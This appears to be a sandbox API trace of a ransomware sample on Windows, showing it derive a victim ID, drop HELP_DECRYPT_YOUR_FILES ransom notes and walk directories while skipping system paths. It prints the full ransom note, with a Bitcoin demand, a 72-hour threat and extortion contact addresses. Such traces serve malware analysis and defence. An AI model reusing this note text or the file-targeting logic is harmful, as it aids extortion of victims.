	[0167.808] CloseHandle (hObject=0x39c) returned 1
	[0167.809] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.809] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.809] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0167.810] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0167.810] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0167.810] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0167.811] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0167.811] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0167.811] CloseHandle (hObject=0x39c) returned 1
	[0167.811] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.812] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.812] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0167.812] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\HELP_DECRYPT_YOUR_FILES.HTML") returned 120
	[0167.812] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0167.813] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0167.814] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0167.816] CloseHandle (hObject=0x39c) returned 1
	[0167.816] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.817] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.817] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.817] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0167.818] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.818] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0167.818] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0167.819] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.819] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0167.819] CloseHandle (hObject=0x39c) returned 1
	[0167.819] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x7d8ef8a1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660063, dwReserved1=0x370038, cFileName=".", cAlternateFileName="")) returned 0xfb90f0
	[0167.820] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*") returned 95
	[0167.820] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.820] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*", cchLength=0x5f | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*") returned 0x5f
	[0167.820] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.820] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="windows") returned 0x0
	[0167.820] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.821] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="boot") returned 0x0
	[0167.821] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.821] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="system volume information") returned 0x0
	[0167.821] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.821] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.821] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.821] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="temp") returned 0x0
	[0167.821] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.821] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="program files") returned 0x0
	[0167.822] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.822] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.822] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.822] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="appdata") returned 0x0
	[0167.822] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.822] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="application data") returned 0x0
	[0167.822] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.822] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="winnt") returned 0x0
	[0167.823] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.823] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="tmp") returned 0x0
	[0167.823] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.823] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="cache") returned 0x0
	[0167.823] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.823] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.823] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.823] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="webcache") returned 0x0
	[0167.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.824] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="inetcache") returned 0x0
	[0167.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.824] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="nvidia") returned 0x0
	[0167.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.824] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="packages") returned 0x0
	[0167.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.824] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="cookies") returned 0x0
	[0167.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.824] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="programdata") returned 0x0
	[0167.825] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0167.825] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0167.825] FindNextFileW (in: hFindFile=0xfb90f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x7d8ef8a1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660063, dwReserved1=0x370038, cFileName="..", cAlternateFileName="")) returned 1
	[0167.825] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0167.825] FindNextFileW (in: hFindFile=0xfb90f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d8ef8a1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d8ef8a1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d8ef8a1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x660063, dwReserved1=0x370038, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0167.825] FindNextFileW (in: hFindFile=0xfb90f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d8c9607, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d8c9607, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d8c9607, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x660063, dwReserved1=0x370038, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0167.825] FindNextFileW (in: hFindFile=0xfb90f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9eb0c2e2, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9eb0c2e2, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9eb0c2e2, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x660063, dwReserved1=0x370038, cFileName="resource.xml", cAlternateFileName="")) returned 1
	[0167.825] FindNextFileW (in: hFindFile=0xfb90f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9eb0c2e2, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9eb0c2e2, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9eb0c2e2, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x660063, dwReserved1=0x370038, cFileName="resource.xml", cAlternateFileName="")) returned 0
	[0167.825] FindClose (in: hFindFile=0xfb90f0 | out: hFindFile=0xfb90f0) returned 1
	[0167.825] FindClose (in: hFindFile=0xfb90f0 | out: hFindFile=0xfb90f0) returned 0
	[0167.826] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1
	[0167.826] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d87d0a1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d87d0a1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d87d0a1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0167.826] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d856c7c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d856c7c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d87d0a1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0167.826] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="netfol.ico", cAlternateFileName="")) returned 1
	[0167.826] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14668, dwReserved0=0x0, dwReserved1=0x0, cFileName="pictures.ico", cAlternateFileName="")) returned 1
	[0167.826] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.xml", cAlternateFileName="")) returned 1
	[0167.826] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9, dwReserved0=0x0, dwReserved1=0x0, cFileName="ringtones.ico", cAlternateFileName="")) returned 1
	[0167.826] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10850, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.ico", cAlternateFileName="")) returned 1
	[0167.826] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0x0, dwReserved1=0x0, cFileName="sync.ico", cAlternateFileName="")) returned 1
	[0167.826] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2aff, dwReserved0=0x0, dwReserved1=0x0, cFileName="tasks.xml", cAlternateFileName="")) returned 1
	[0167.827] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmp.ico", cAlternateFileName="")) returned 1
	[0167.827] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmp.ico", cAlternateFileName="")) returned 0
	[0167.827] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0167.827] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0167.827] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1
	[0167.827] lstrcmpW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="..") returned 1
	[0167.827] lstrcmpW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2=".") returned 1
	[0167.827] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task"
	[0167.827] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\"
	[0167.828] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", lpString2="{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}"
	[0167.828] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}"
	[0167.834] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\"
	[0167.834] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\"
